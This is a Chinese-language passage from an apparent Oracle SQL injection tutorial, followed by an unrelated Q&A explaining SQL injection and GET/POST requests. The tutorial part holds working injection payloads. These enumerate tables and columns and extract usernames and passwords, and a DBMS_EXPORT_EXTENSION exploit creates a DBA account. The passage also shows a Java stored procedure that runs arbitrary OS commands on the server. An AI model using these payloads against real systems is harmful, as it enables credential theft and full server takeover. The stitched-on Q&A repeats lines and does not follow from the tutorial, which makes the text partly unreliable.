　　这样就得到了第二个表名，我们假设是manage 然后以此类推就可以得到所有的表名0x03：得到所有列名and 1=2 union select 1,2,( select column_name from user_tab_columns where table_name=’manage’ and rownum=1),4,5,6 from dual
　　系统表多了就是这种好处，什么都可以去系统表中找到，如果再碰上盲注，那不哭了。
　　然后才查询第二个表名，假设第一个得到的是usernameand 1=2 union select 1,2,( select column_name from user_tab_columns where table_name=’manage’ and rownum=1 and column_name<>’username’),4,5,6 from dual
　　这样第二个就出来了，架设是password 同样是依次类推即可得到所有的列名0x04：得到列中数据
　　查询指定列中数据没什么好说的，就像其他数据库一样and 1=2 union select 1,2,username,4,5,6 from manage
　　and 1=2 union select 1,2,password,4,5,6 from manage
　　这样用户名，密码都可以得到了0x05：获取所有数据库
　　这种情况是存在你需要跨裤的情况下，其实一般情况下用不到，至于原因嘛，由各位看官自己体味了。
　　先来爆出第一个数据库名and 1=2 union select 1,2,(select owner from all_tables where rownum=1),4,5,6 from dual
　　然后第二个，假设第一个是current_dband 1=2 union select 1,2,(select owner from all_tables where rownum=1 and owner<>’current_user’),4,5,6 from dual
　　然后就不用我说了吧，各位应该都很熟悉了。0x06：利用ORACLE的systeminfo权限拿下服务器
　　oracle本身经常是已system运行的，所以拿下了oracle基本拿下了服务器了
　　1. 首先是添加账户，利用的命令如下：and ‘’||SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(‘FOO’,'BAR’,'DBMS_OUTPUT”.PUT(:P1);EXECUTE IMMEDIATE ”DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ””Create USER linux IDENTIFIED BY linux””;END;”;END;–’,'SYS’,0,’1′,0)=”—
　　2. 查看账户是否添加成功and”||(select user_id from all_users where username=’linux’)
　　3. 接下来是把我们建立的用户加入到dba中and”||SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(‘FOO’,'BAR’,'DBMS_OUTPUT”.PUT(:P1);EXECUTE IMMEDIATE ”DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ””grant linux to rebeyond””;END;”;END;–’,'SYS’,0,’1′,0)=”—
　　4. 之后没得说了就是为我们建立的用户赋予远程连接的权限and”||(select SYS.DBMS_EXPORT_EXTENSION.GET.DOMAIN_INDEX_TABLES(‘FOO’,'BAR’,'DBMS_OUTPUT”.PUT(:P1);EXECUTE IMMEDIATE ” DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ” ” GRANT CONNECT to linux ” ”;END;–’,SYS’,0,’1′,0) from dualp
　　下面就远程连接了,连接之后需要建立存储过程
　　第一步：create or replace and compile
　　java souRCe named “util”
　　as
　　import java.io.*;
　　import java.lang.*;
　　public class util extends Object
　　{
　　public static int RunThis(String args)
　　{
　　Runtime rt = Runtime.getRuntime();
　　int RC = -1;
　　try
　　{
　　Process p = rt.exec(args);
　　int bufSize = 4096;
　　BufferedInputStream bis =new BufferedInputStream(p.getInputStream(), bufSize);
　　int len;
　　byte buffer[] = new byte[bufSize];
　　// Echo back what the program spit out
　　while ((len = bis.read(buffer, 0, bufSize)) != -1)
　　System.out.write(buffer, 0, len);
　　RC = p.waitFor();
　　}
　　catch (Exception e)
　　{
　　e.printStackTrace();
　　RC = -1;
　　}
　　finally
　　{
　　return RC;
　　}
　　}
　　}
　　第二步： www.2cto.com
　　create or replace
　　function RUN_CMz(p_cmd in varchar2) return number
　　as
　　language java
　　name ‘util.RunThis(java.lang.String) return integer’;
　　第三步：
　　create or replace procedure RC(p_cmd in varChar)
　　as
　　x number;
　　begin
　　x := RUN_CMz(p_cmd);
　　end;
　　创建完之后，就可以通过x := RUN_CMz(dos命令)来执行系统命令了

什么是sql注入？我们常见的提交方式有哪些？

针对你得问题，我有以下回答，希望能解开你的困惑。
首先回答第一个问题：什么是SQL注入?
一般来说，黑客通过把恶意的sql语句插入到网站的表单提交或者输入域名请求的查询语句，最终达到欺骗网站的服务器执行恶意的sql语句，通过这些sql语句来获取黑客他们自己想要的一些数据信息和用户信息，也就是说如果存在sql注入，那么就可以执行sql语句的所有命令
那我延伸一个问题:sql注入形成的原因是什么呢？
数据库的属于与网站的代码未严格分离，当一个黑客提交的参数数据未做充分的检查和防御的话，那么黑客的就会输入恶意的sql命令，改变了原有的sql命令的语义，就会把黑客执行的语句带入到数据库被执行。
现在回答第二个问题：我们常见的注入方式有哪些？
我们常见的提交方式就是GET和POST
首先是GET，get提交方式，比如说你要查询一个数据，那么查询的代码就会出现在链接当中，可以看见我们id=1，1就是我们搜索的内容，出现了链接当中，这种就是get。
第二个是Post提交方式是看不见的，需要我们利用工具去看见，我们要用到hackbar这款浏览器插件
可以就可以这样去提交，在这里我搜索了2，那么显示的数据也就不同，这个就是数据库的查询功能，那么的话，get提交比post的提交更具有危害性。
第二个是Post提交方式是看不见的，需要我们利用工具去看见，我们要用到hackbar这款浏览器插件。
以上便是我的回答，希望对你有帮助。